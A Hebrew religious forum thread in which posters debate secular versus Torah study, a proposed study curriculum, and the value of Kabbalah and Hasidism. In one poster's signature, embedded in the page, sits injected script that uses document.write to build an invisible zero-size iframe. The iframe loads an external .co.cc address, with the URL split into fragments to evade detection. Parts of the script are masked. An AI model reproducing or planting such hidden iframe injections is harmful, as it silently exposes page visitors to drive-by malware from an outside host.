בית פורומים עצור כאן חושבים

האשליה המכונה "עובד ולומד"

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-27/6/2013 10:06 לינק ישיר 

מיימוני כתב:
דורש ייחודך

יש לך תפיסות ייחודיות ושונות מאד משלי.

בנושאים כמו: מהי תורה, מהי עבודת השם, וגם בשאלות היסטוריות וחברתיות.

א. לדבריך יש תורה ויש מקצועות חול וחכמות חיצוניות.
מקצועות חול הם חכמות חיצוניות אלא שהם יכולים גם להחשב כמצווה כדלקמן
נתחיל בתחום האחרון.

חוששני שעצם החילוק אינו מדוייק.

התורה והבנתה בנויות על חכמות. רק שאין אנו מודעים לכך.

זה ראוי לאשכול בפני עצמו.

ומה הן אותן חכמות?

אם חכמות חיצוניות הן רפואה, מחשבים, הנדסה לכל סוגיה, אזי דומה שעיסוק בהן גם הוא מצוה.
מסכים לחלוטין מצווה על האדם לפרנס את בני משפחתו ולעזור לזולת.
יתכן ללמוד אפילו "מדעי היהדות", עם כל הבעייתיות שיש בהם, אם זה נעשה בזהירות וכל שכן לשם שמים. לפרנסה קלה ולדעת מה שנשיב להם ולעצמנו.
האם מותר להתפרנס מעסק שאסור לפי תורה? הסנהדרין למדו ע"ז (סליחה על ההשוואה) כדי לדעת האיסורים שבזה ומה שתשיב, אבל שאר בני אדם אפי' חכמים לא הורשו ללמוד זאת.
אם לאדם יש רגשות חזקות [שאינם מניחים לו ] שחסר לו ידע וכו' והוא יכול לחזק את אמונתו ע"י למוד מדעי היהדות אז אולי יש מקום להתיר [ושוב רק מתוך הגישה של החיזוק ולא להפך- כמובן איני מדבר על חקירה כ"א על מדעי היהדות מול דתות אחרת בקורת המקרא וכו'].  
ב. גם תפיסת התורה שלך שונה מאד משלי. התורה שאתה מציע ללמוד מורכבת, אני משער, מחומש עם רש"י ואולי עם רמב"ן, דף יומי עד לסיום הש"ס, אולי ראשונים ואחרונים ופוסקים. וסוף סוף תאות הנפש: לימוד הקבלה (מאילו ספרים? טוב, לא משנה).

הייתי מציע סדר שונה לחלוטין בסגנון פסק הרמב"ם אודות מי שלא למד תורה בקטנותו-"ישלש". לדעתי כיון שאין היום כמעט אנשים המסוגלים ללמוד לפי הסדר שהורנו חז"ל במשנה ובעיקר צריכים להתלמד כיצד ללמוד,ראוי להתמקד יותר בלימוד הלכה בשו"ע נושא כלים וקיצורים למעשה לערך שליש, ללמוד גמרא לעיון ובקיאות חלק שליש ,  וזמן דומה להשקיע בלימוד פנמיות התורה ומוסר.
מי שיש לו זמן נוסף בהחלט ראוי להרחיב אופקים וללמוד תנ"ך עם מפורשים .
חקירה קבלה ועוד שייך רק לזקן ורגיל [לא שאני אוחז שהחיוב והחשיבות ללמוד אותם פחות אלא מצד עומק המושג וקוצר המשיג].

התורה שאני מציע ללמוד מכילה דברים אחרים ובנויה אחרת.

חומש ותנ"ך עם כל המפרשים שעוזרים להבין פשט.

משנה ותלמוד ומקורות תנאיים נוספים כמו מדרשי הלכה ותוספתא
מאי קמשמע לן זה חלק מהעיון, אבל יש שמזניחים זאת מכיון שמדובר בהרחבה שמעבר ושמא אתה מתיימר להכניס זאת ללמוד הישיבתי ליטאי - שוין.
אגדות ופרשנויות ופילוסופיה כדי לדעת את השקפת היהדות המשתנה לדורותיה.
כנ"ל שיש בזה סכנה מצד עומק המושג וקוצר המשיג.
לימוד פסקים כדי לדעת איך להתנהג. לימוד צורת הפסק כדי לדעת איך פוסקים וכדי לא להיות תלוי ברבנים שסובלים מהבעיה שעליה הצביע מ (רק שהרשימה שלי ארוכה משלו וכוללת בעיות אחרות... כמתועד בפורום).
מוסכם. 
ללימוד הקבלה אין שום ערך לדעתי מפני שכולו דמיון ומשחק בסמלים.

נניח שלטעמך לימוד הקבלה ברובד הספ' וכו' הוא משחק מילים ויותר מזה[ידוע שיטתך בזה].
אך הרובד ששיך לעבודת ה' בקבלה- מה שהוגדר לעיל כפנמיות התורה(חסידות),[כלומר ידיעת גדלות ה' בדרך השלילה מהגשמות ההרכבה ואפי' הרכבה מופשטת ואיך שהם שורש לנפש ויש לה לשוב למקורה וכו'] חייבים להתעסק בו כדי לעבוד את ה' עבודה תמה בתיקון המידות ואהוי"ר ה'.
[וניתן להתווכח האם יש קשר בין הקבלה למונחים שהזכרתי כעת אך אין כאן המקום] 

ג. היסטוריה וחברה.

הצגת תמונה מסויימת על החזו"א ועל רבי ומורי ע"ה הרב גדליה נדל.

זה שלא כיבדת אותו בתואר "רב" לא מפחית מכבודו (אולי צורם לי, אבל יש דברים שצורמים לי יותר), ולכל היותר מראה שאינך מכירו ואת תורתו.

אם לא הזכרתי אותו בתואר הרב היה זה בטעות ועם הנפגעים הסליחה.
לא באתי להמעיט בכבודו במאום ואין לי שום אינטרס לעשות זאת.

מה שכתבת עליו עוד דומה שאינו מדוייק.

הפתרון לבורות הוא תמיד ללמוד, אבל יש דברים הרבה יותר חשובים שעליך לדעתי להשלים...
סבבה.

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי דורש_יחודך ב- 27/06/2013 10:31:11

תוקן על ידי דורש_יחודך ב- 27/06/2013 10:34:40

דדווח על תוכן פוגעני

נשלח ב-27/6/2013 10:23 לינק ישיר 

דורש ייחודך

אני שמח לגלות שטעיתי בך ואני מתנצל שלא כיבדתי אותך כיאות.

גם ראיתי שיש דברים רבים שאנו שוים בהם ולא ידעתי. שוב סליחה.

לגבי לימוד הקבלה בדרך החסידות וכיצד לומדים מזה על

ידיעת גדלות ה' בדרך השלילה מהגשמות ההרכבה ואפי' הרכבה מופשטת]

וכיצד זה מועיל

כדי לעבוד את ה' עבודה תמה בתיקון המידות ואהוי"ר ה'.

כל זה ראוי לאשכול בפני עצמו. בבקשה. אשמח ללמוד אך עלי להתרות שמן הסתם אהיה מן המבקרים והשוללים.

יש גם לדון בשאלה מה חשיבות המקורות המשניים שנדחו במשך דורות הצידה אצל רובנו, כמו תוספתא ועוד. אבל גם זה ראוי לאשכול אחר.

אני מודה לך על ההערה לגבי מדעי היהדות. אכן סברתי בטעות שמה שלא הזיק לי, כלומר לעיין בספרי מחקר, ואף הועיל, הוא שוה לכל נפש. אכן הדברים ראויים לבדיקה.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-27/6/2013 10:35 לינק ישיר 

הקשר בין ההפשטה וכו' לעבודה ראה בתיקונים והוספות שלעיל.

דדווח על תוכן פוגעני

נשלח ב-27/6/2013 17:14 לינק ישיר 

הרב מיימוני, רצוני לשמוע את דעתך. מדוע אין תועלת בעיסוק בקבלה? לכאורה היא א. מחזקת את היראת שמים ב. אופפת אותך במושגים רוחניים אשר מחברים אותך לתו"מ. ג. נותנת "מענה" לשאלות תיאולוגיות, כגון משמעות המצוות וכו' אז נכון שהבסיס שקר, האם במובנים הללו הזהר לא ממשיך את דרך האגדה העתיקה?? מן האדומים על חזל: "כל שהוא לעשות שלום ביננו לבין אבינו שבשמים - מצווה לשקר"

דדווח על תוכן פוגעני

נשלח ב-27/6/2013 17:18 לינק ישיר 

הרב מיימוני, רצוני לדעת את דעתך. מדוע אין תועלת בעיסוק בקבלה? לכאורה היא א. מחזקת את היראת שמים ב. אופפת אותך במושגים רוחניים אשר מחברים אותך לעולם התו"מ. ג. נותנת "מענה" לשאלות תיאולוגיות, כגון משמעות המצוות וכו' אז נכון שהבסיס שקר, האם במובנים הללו הזהר לא ממשיך את דרך האגדה של חזל?? מן האדומים על חזל: "כל שהוא לעשות שלום ביננו לבין אבינו שבשמים - מצווה לשקר"

תוקן על ידי אלקרטאווי ב- 27/06/2013 17:22:21

דדווח על תוכן פוגעני

נשלח ב-28/6/2013 18:28 לינק ישיר 

אלקרטאווי

בשמחה!

אבל לא נערב שמחה בשמחה. פתח נא אשכול עם השאלות החשובות האלו, ואציג את עמדתי, ויציג נא גם דורש ייחודך את משנתו שלו. ונבחן יחד.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > האשליה המכונה "עובד ולומד"
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 ... 6 7 8 סך הכל 8 דפים.

bholext